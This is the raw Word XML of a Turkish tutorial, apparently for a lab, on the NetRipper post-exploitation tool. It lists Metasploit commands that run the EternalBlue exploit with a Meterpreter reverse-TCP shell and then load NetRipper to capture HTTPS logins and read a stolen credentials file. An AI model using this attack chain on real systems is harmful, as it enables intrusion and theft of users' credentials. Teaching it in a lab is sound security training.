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F77D" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A2536">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetRipper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">, bir </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> veya Windows cihazında çalışan kullanıcı süreçlerini hedef alarak, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTPS trafiğinden kimlik bilgileri ve oturum verileri gibi hassas verileri elde etmek</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> için kullanılan bir post-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>exploitation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> aracıdır. Özellikle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> oturumu üzerinden çalıştırılır</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve ağ trafiğini dinler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7439A951" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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975A73C" w14:textId="165C7678" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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619D9A3D" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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üzerinden çalışan </w:t>
      </w:r>
      <w:r w:rsidRPr="003A253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dinamik yüklenebilir modül</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7632F025" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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Process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A253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injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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hedef uygulamadan veri çekme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B33C16A" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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>Tarayıcı trafiği, şifre girişleri, form verileri gibi çıktılar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8FD0A8" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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TLS şifrelemesini aşmak için </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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içinden veri toplar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47448C01" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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>Session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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tabanlı çıktı klasörleri oluşturur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBBED70" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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>Web uygulamalarındaki girişleri analiz etmek için kullanılır</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A66AD1" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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2F757458" w14:textId="14CC9615" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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NetRipper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A253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Aracının </w:t>
      </w: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3A253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Ortamında Kullanımı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3D1C11" w14:textId="77777777" w:rsidR="007F3392" w:rsidRPr="003A2536" w:rsidRDefault="007F3392">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A68D6AF" w14:textId="11AFFC20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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Framework’ü</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144A8ADD" w14:textId="567F7C53" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41751C17" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9BD42E" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0160367C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Hedef Sisteme </w:t>
      </w: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Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Shell Elde Et (Örnek)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53286AA0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36BC19C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use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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exploit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windows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smb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/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EF3E8F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set</w:t>
      </w:r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RHOSTS 192.168.1.105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103FD955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set</w:t>
      </w:r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PAYLOAD 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windows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meterpreter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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C813C23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set</w:t>
      </w:r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LHOST 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288DD7A0" w14:textId="68A47A7E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exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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203A2013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78337FC4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68331F4F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3: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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NetRipper’ı</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Yükle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389712F" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A2536">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>NetRipper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>capture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>netripper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> modülüyle gelir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB3F156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use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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post/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windows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capture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netripper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67C17910" w14:textId="67319463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set</w:t>
      </w:r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SESSION 1</w:t>
      </w:r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E81DF32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67F54406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Modülü Başlat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEB54BF" w14:textId="112BFB8B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run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2A71F26C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02D41961" w14:textId="77777777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Veri Toplama ve Sonuçların İncelenmesi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE6160" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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74A701F" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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>NetRipper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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otomatik olarak hedef sistemdeki HTTPS form girişlerini, post verilerini ve bazı </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>credential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A253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akışlarını toplar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C96862" w14:textId="558853D8" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536" w:rsidP="003A253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ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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root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/.msf4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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loot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/netripper_session_1/</w:t>
      </w:r>
      <w:r w:rsidRPr="003A253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426B4366" w14:textId="37FB933A" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="494BF462" wp14:editId="34F92835">
            <wp:extent cx="2159000" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1822953372" name="Resim 1" descr="yazı tipi, metin, grafik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53372" name="Resim 1" descr="yazı tipi, metin, grafik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1DEB" w14:textId="77777777" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DB654F" w14:textId="08512101" w:rsidR="003A2536" w:rsidRPr="003A2536" w:rsidRDefault="003A2536">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A2536">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials.txt” ile o dosyayı terminalde görüntüleyebiliriz</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003A2536" w:rsidRPr="003A253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4979"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBD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2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36"/>
    <w:rsid w:val="003A2536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95E37"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BEA2EBFF-1303-494D-B04E-27C6EA4A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A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A2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2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25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25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25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25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A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A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25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25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25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25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25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25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A25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A25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A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A25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A25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A25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A25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A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A25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A253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A25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3A2536"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p2">
    <w:name w:val="p2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003A25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3A25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2025-08-06T12:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-06T12:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>